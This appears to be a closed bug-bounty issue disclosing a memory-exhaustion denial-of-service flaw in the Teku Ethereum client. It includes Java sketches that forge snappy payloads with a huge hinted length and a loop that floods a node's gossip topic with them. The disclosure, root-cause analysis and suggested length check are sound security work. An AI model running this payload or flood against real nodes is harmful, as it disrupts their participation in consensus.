Closed by tintinweb 4 years ago
Teku quickly gets out of sync and memory consumption goes up; it eventually dumps the heap at around minute 9, allowing it to re-sync for a bit.
(Video attachment demonstrating the behaviour)
Interestingly enough, when I try this now Teku doesn't seem to recover anymore 🤔 (3 seconds of flooding).
Thank you for the detailed report! We'll review it and ask the Teku team for feedback, but that may all take some time. We'll get back to you sometime next week. Thanks :+1:
Reproduced on Teku: https://github.com/PegaSysEng/teku/issues/2730 Thanks! 👍
Sorry for the delay. Thank you @tintinweb! This qualifies for the $5k reward tier.
Can you reach out to me at eth2bounty@ethereum.org to get payment set up?
Also, note that this program has recently been deprecated in favor of the eth2bounty program, which should encompass any of the issues you might find here and more. Current rewards are up to $50k! Happy bug hunting
Note:
I actually had to run this on medalla, restricting the attacker to my local network, as I wasn't able to sync with the attacknet even after trying for multiple days.

Note:
It would be great to have a step-by-step guide (besides the readmes and config files) on how to set up a node to sync with the attacknet.

Description
Teku nodes are vulnerable to a resource exhaustion attack: a buffer is allocated from an unchecked, attacker-controlled length field, causing a DoS condition that prevents them from participating in consensus.
Attack scenario
A malicious node may forge invalid snappy-encoded gossipsub messages that cause Teku to allocate an arbitrary amount of memory, eventually triggering a JVM out-of-memory condition. Teku can be kept busy processing the malicious gossipsub messages, producing numerous stack traces and large short-lived allocations. The JVM can trivially be forced into an out-of-memory condition, causing it to dump the heap memory to disk once (per PID).
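To make the mechanism concrete, here is a minimal sketch (not part of the original report) of how the claimed uncompressed length is encoded: a raw snappy stream starts with a varint preamble that the sender, i.e. the attacker, fully controls.

```java
import java.io.ByteArrayOutputStream;

// Sketch: a raw snappy stream begins with a little-endian base-128 varint
// holding the *claimed* uncompressed length. The sender controls this value
// completely; nothing in the preamble proves the payload really inflates to
// that size.
public class ForgedSnappyPreamble {

    // Encode a value as a base-128 varint (least-significant group first).
    static byte[] varint(long value) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        while ((value & ~0x7FL) != 0) {
            out.write((int) ((value & 0x7F) | 0x80));
            value >>>= 7;
        }
        out.write((int) value);
        return out.toByteArray();
    }

    public static void main(String[] args) {
        byte[] prefix = varint(0x7fffffffL); // claim ~2 GB of uncompressed data
        for (byte b : prefix) System.out.printf("%02X ", b & 0xFF); // FF FF FF FF 07
        System.out.println();
        // A tiny gossip message = this 5-byte prefix plus a handful of junk bytes.
    }
}
```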
Impact

Targeted Teku nodes stop processing /eth2/e7a75d5a/beacon_block gossip messages and fall behind catching up blocks (see log below).

Note
It's probably enough to just keep the node busy with unidirectional gossipsub messages.

Details

Proof
Node is syncing:
Node falls behind:
Full Console log:
Teku log:
Heap dump files:
Hinting a decompressed length of ~2 GB (0x7fffffff) forces the JVM to dump the heap.

900 MB heap dump
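For illustration (this snippet is not from the report), feeding such a forged preamble to xerial's snappy-java shows where the ~2 GB figure comes from; running it under the report's conditions reproduces the OutOfMemoryError that triggers the heap dump.

```java
import java.io.IOException;
import org.xerial.snappy.Snappy;

// Sketch (assumes xerial snappy-java, the library Teku uses, on the classpath):
// the forged preamble FF FF FF FF 07 decodes to 0x7fffffff, and uncompress()
// allocates an output buffer of exactly that size before validating anything.
public class HintedLengthDemo {
    public static void main(String[] args) throws IOException {
        byte[] forged = {(byte) 0xFF, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF, 0x07, 0, 0, 0, 0};
        System.out.println(Snappy.uncompressedLength(forged)); // prints 2147483647 (~2 GB)
        Snappy.uncompress(forged); // attempts new byte[2147483647] -> OutOfMemoryError
    }
}
```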
PoC
Note:
For simplicity, I ran the PoC and the target node on the same system.

Setup
Target (teku)
codebase: teku master@8167a9d42aaf2a05e127fba946ed8de1d8fe823e
Attacker (prysm)
codebase: prysm
I've patched Prysm to perform the attack while syncing. We're hinting a snappy-encoded payload length of 0x<random-0-f>fffffff, eventually causing an out-of-memory condition or just large short-lived allocations. Additionally, the attacker sends the payload 10000000 times in each sync loop. This should keep the peer pretty busy.

Note: In my tests it was enough to just run the PoC for a couple of seconds, until memory consumption was close to max, to cause Teku to fall behind and not receive blocks for multiple epochs. It is therefore assumed that the attacker does not have to flood the target continuously (the 10000000 is probably overkill :D).
I will provide a fully working diff on request if someone wants to reproduce.
loop:
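The patched loop itself is not reproduced above; as a purely illustrative sketch (in Java rather than Prysm's Go, with publish() as a hypothetical stand-in for the gossipsub send), it amounts to something like this:

```java
import java.io.ByteArrayOutputStream;
import java.util.Random;

// Illustrative only; the real PoC is a Go patch to Prysm's sync loop.
// publish() is a hypothetical placeholder for "send this payload as a
// gossipsub message on /eth2/e7a75d5a/beacon_block".
public class FloodSketch {

    // Forged payload: a varint preamble claiming `hint` bytes of uncompressed
    // data, followed by a few junk bytes that will never decompress cleanly.
    static byte[] forged(long hint) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        while ((hint & ~0x7FL) != 0) {
            out.write((int) ((hint & 0x7F) | 0x80));
            hint >>>= 7;
        }
        out.write((int) hint);
        out.write(0); out.write(0); out.write(0); out.write(0);
        return out.toByteArray();
    }

    public static void main(String[] args) {
        Random rnd = new Random();
        for (int i = 0; i < 10_000_000; i++) {
            long hint = ((long) rnd.nextInt(16) << 28) | 0x0FFFFFFFL; // 0x<0-f>fffffff
            publish("/eth2/e7a75d5a/beacon_block", forged(hint));
        }
    }

    static void publish(String topic, byte[] payload) {
        // hypothetical transport; in the PoC this is Prysm's gossipsub publish
    }
}
```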
Root Cause
Teku's snappy uncompress (SnappyBlockCompressor) calls xerial.Snappy.uncompress:

Snappy.uncompress(received_data)

https://github.com/PegaSysEng/teku/blob/f7daad76ffa8d13f6117516acd7a46bc143df394/networking/eth2/src/main/java/tech/pegasys/teku/networking/eth2/gossip/encoding/SnappyBlockCompressor.java#L28
Xerial's Snappy.uncompress allocates a buffer of the hinted length without sanity checking:
byte[] result = new byte[Snappy.uncompressedLength(input)];
https://github.com/xerial/snappy-java/blob/eb341bf08fbc56fa52f646d75ce902d0486dbb8b/src/main/java/org/xerial/snappy/Snappy.java#L491
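For context, a guard along the following lines (hypothetical, not Teku's or xerial's actual fix; MAX_UNCOMPRESSED_BYTES is an assumed cap) is the kind of sanity check that is missing here, bounding the allocation before the data reaches snappy:

```java
import java.io.IOException;
import org.xerial.snappy.Snappy;

// Hypothetical caller-side guard, not Teku's actual fix: reject implausible
// hinted lengths before snappy allocates the output buffer.
public final class BoundedSnappy {

    // Assumed cap; a real implementation would derive it from the maximum
    // allowed gossip message size rather than this arbitrary value.
    private static final int MAX_UNCOMPRESSED_BYTES = 10 * 1024 * 1024;

    public static byte[] uncompress(byte[] input) throws IOException {
        int hinted = Snappy.uncompressedLength(input); // attacker-controlled value
        if (hinted < 0 || hinted > MAX_UNCOMPRESSED_BYTES) {
            throw new IOException("implausible uncompressed length: " + hinted);
        }
        return Snappy.uncompress(input); // allocation now bounded by the check above
    }
}
```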